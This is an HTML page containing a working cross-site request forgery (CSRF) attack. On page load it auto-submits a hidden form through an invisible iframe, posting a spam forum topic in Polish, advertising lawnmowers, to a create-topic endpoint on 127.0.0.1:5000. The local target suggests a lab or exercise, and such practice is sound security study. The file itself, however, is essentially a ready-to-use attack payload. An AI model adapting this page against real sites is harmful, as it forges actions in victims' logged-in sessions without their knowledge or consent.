<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body onload="document.formattack.submit()">
    <form action="http://127.0.0.1:5000/create-topic" method="post" target="hidden-frame" name="formattack">
        <input name="title" value="TOP 20 Najlepszych Kosiarek 2k20!" type="hidden">
        <textarea name="text" style="display:none;"> Polecam najlepsze kosiarki w 2k20 nic tylko kupowac! </textarea>
    </form>

<iframe name="hidden-frame" style="display:none;"></iframe>

</body>
</html>